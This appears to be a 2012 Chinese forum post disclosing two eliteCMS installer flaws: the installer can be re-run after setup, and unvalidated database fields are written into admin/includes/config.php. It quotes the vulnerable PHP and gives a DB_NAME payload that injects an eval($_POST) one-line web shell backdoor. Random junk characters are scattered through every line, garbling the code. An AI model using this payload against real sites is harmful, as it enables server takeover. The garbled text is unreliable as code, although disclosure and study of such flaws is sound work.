eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装 \0 U% Y# @/ C w3 Q' g0 `; F
% [3 e2 ~2 `" N6 p0 E; D4 |另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php: p2 Y! Q# P! E
我们来看代码:4 i* f, T E% g* F, H
/ C S. S: w1 s o; G! G. D& O...7 C2 ^) B0 e/ l5 C2 _, U7 K
elseif ($_GET['step'] == "4") {+ _9 L. z4 }. @9 a
$file = "../admin/includes/config.php";" i0 c5 w% q* w2 x5 ?4 c
$write = "<?php\n";1 X# [) q/ ]& k( S f. f0 t
$write .= "/**\n";
2 c4 }/ ]* I! H' X $write .= "*\n";2 o& b/ D5 k# Y# b
$write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";; T6 {- g' ~. k {/ G* i G: w
...略...
; F0 O' x: W4 |3 K $write .= "*\n";" f& V2 M- O8 z% w% S
$write .= "*/\n";
$ T0 B6 ~+ O9 p7 K1 E0 P $write .= "\n";
3 \; w1 _9 ]" T; ^1 B; Z $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";+ ~8 n9 B- l# H6 @, ?* I8 d# T
$write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
! _; Q, L7 h1 _8 E $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
4 U2 y; f! d) {' d( i $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
/ B( R2 w: m! y" l* F $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
* z: k' \, A; D, d0 |. ^ $write .= "if (!\$connection) {\n";
6 G: |' Q5 }; n1 S $write .= " die(\"Database connection failed\" .mysql_error());\n";* B) \0 A* n0 b! s9 t% _
$write .= " \n";
3 N# |' s- {3 v $write .= "} \n";
, o6 a, a, v, @5 r: P$ b" f- Q $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
8 G7 \1 |4 p% w/ I $write .= "if (!\$db_select) {\n";
7 c, k% ^! _, A7 F& S $write .= " die(\"Database select failed\" .mysql_error());\n";' Y* I3 ^1 `, R( w' q. b- G
$write .= " \n";
5 r" k6 C9 R. L- i; f3 c8 T $write .= "} \n";9 x- t4 k* `$ \# ~
$write .= "?>\n";
& w7 ^6 k: H- g% m1 {
) } z3 A! _6 h# O. O $writer = fopen($file, 'w');0 P4 m) r/ t* F
...
* x1 t8 y9 E1 q; h1 c- f; j u& k ; j2 ], I+ x! _6 W
在看代码:
7 {5 P9 F, r0 K0 ~2 [5 s; B% i4 e $ m" N E* N# v- r9 L4 Z. R
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
1 U; ^1 w3 Y8 ]5 _. ~! |6 ]$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
) ?' ?0 U% p: b4 q# R. F$_SESSION['DB_USER'] = $_POST['DB_USER'];6 J2 c5 \& f! B- Q
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];1 J. Q! {8 t6 L* O# Y
3 J/ V0 Y. A0 \2 s5 `! J+ O取值未作任何验证3 E8 Y3 m9 \3 H
如果将数据库名POST数据:- R; v% P$ u9 M3 C" Z3 y8 @
! t: x4 _/ |! [# f% q"?><?php eval($_POST[c]);?><?php
: Q3 V# }7 i& X. Y5 L- N. F. _ 1 l5 X1 o. q4 K: k- w! s
将导致一句话后门写入/admin/includes/config.php
# d. r t" B9 \& O6 } |
发表于 2012-11-18 13:59:27
收藏
支持
反对